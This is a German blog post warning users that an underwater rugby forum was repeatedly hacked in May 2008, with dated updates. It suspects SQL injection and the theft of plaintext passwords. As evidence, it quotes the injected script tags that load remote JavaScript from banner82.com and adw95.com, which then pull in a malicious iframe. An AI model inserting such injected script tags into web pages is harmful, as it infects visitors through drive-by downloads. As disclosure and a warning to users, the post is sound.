Hannes

Warnung: Tanjas UWR Forum (wiederholt) gehackt (5 Updates)

von Hannes
Sophos: Virus / Spyware

In der Vergangenheit wurde Tanjas UWR Forum bereits Opfer verschiedenster Spam-Attacken. In der Linkliste tauchen regelmäßig Links zu Online Casinos und ähnlichem auf, im Dezember gab es eine wahre Flut von Spam-Beiträgen von einem Benutzer namens „n/a“. Und jetzt ist das Forum von einer Malware namens „Mal/Badsrc-A“ befallen.
Ich bin der Meinung dass dabei alle Passwörter gestohlen wurden! Wenn Du die gleiche Kombination noch anderswo verwendest, solltest Du sie dort schnellstmöglich ändern!

Update: Inzwischen wechseln sich Angriffe und Reparaturen durch Tanja ab. Leider gelang es ihr bisher nicht die Sicherheitslücke zu schließen. Darüberhinaus weigert Sie sich zu erkennen dass wahrscheinlich alle Passwörter geklaut wurden, schließlich sei „die Passwortspalte nicht betroffen“ gewesen. Das leuchtet ein, bekanntlich verändert sich auch der Inhalt von Büchern wenn man sie liest…

22.05.08 Als ich heute mittag die Startseite des Forums besuchte alarmierte mich mein Virenscanner (Sophos — Antivir und AVG bleiben still) dass die Webseite infiziert sei. Im Quellcode stellte ich fest dass hinter jedem Benutzernamen im Bereich „Neuigkeiten“ ein JavaScript-Schnippsel steht der eine Datei von der Webseite banner82.com nachlädt:
<script src=http://www.banner82.com/x.js></script>*(*In Wirklichkeit b.js) Diese wiederum fügt einen IFrame in die aktuelle Seite ein und lädt darin eine Datei von einem weiteren Server. Der Phishing-Filter von Firefox erkennt die Gefahr und verhindert schlimmeres. Der des Internet Explorer 7 scheint nichts zu merken.

Weiteres Nachforschen ergab:

  • Auf jeder Forumsseite steht der JavaScript Code hinter jedem Benutzernamen.
  • Auf der Suchseite steht der JavaScript Code hinter jedem Benutzernamen.
  • Auf der Profilseite steht der JavaScript Code hinter Benutzernamen, Vornamen, Nachnamen, sowie ICQ-, Y!- und AIM-Namen

Offensichtlich ist es einem Hacker gelungen Schreibzugriff auf die Datenbank zu erhalten (vermutlich durch eine sog. SQL Injection) und alle Benutzerprofile zu modifizieren. Das bedeutet andererseits auch dass es sehr wahrscheinlich ist, dass dieses Individuum auch Lesezugriff hatte.
Warum ist das bedenklich?
Nach allem was ich über die verwendete Foren-Software (Snitz 2000, max. Version 3.3) weiss speichert sie die Passwörter unverschlüsselt in der Datenbank. Das bedeutet irgendwer hat jetzt eine Liste mit allen Benutzernamen und Passwörtern! Wenn Du die gleiche Kombination noch anderswo verwendest solltest Du sie dort schnellstmöglich ändern!

Update am 22.05.:
Tanja hat den Hack in einem Beitrag in ihrem Forum zugegeben. Leider hat sie vergessen auf die eigentliche Gefahr, nämlich den möglichen Passwortklau, hinzuweisen.

Update am 23.05.:
Laut Tanja sind die Accounts restauriert und das Forum funktioniert wieder.

Update am 23.05.:
Das Forum wurde erneut gehackt, diesmal mit folgendem Code:<script src=http://www.adw95.com/x.js></script>* (* wieder b.js)

Update am 23.05. um 18:45 Uhr:
Im Moment geht’s wieder.

Update am 24.05. um 12:05 Uhr:
Es war eigentlich nur eine Frage der Zeit. Zum dritten Mal gehackt.

Hannes

2 Kommentare zu Warnung: Tanjas UWR Forum (wiederholt) gehackt (5 Updates)

  1. Pingback: Angriffe auf Forum reißen nicht ab :: Unterwasserrugby Blog

  2. Pingback: unterwasserrugby.org hats mal wieder erwischt. :: Unterwasserrugby Blog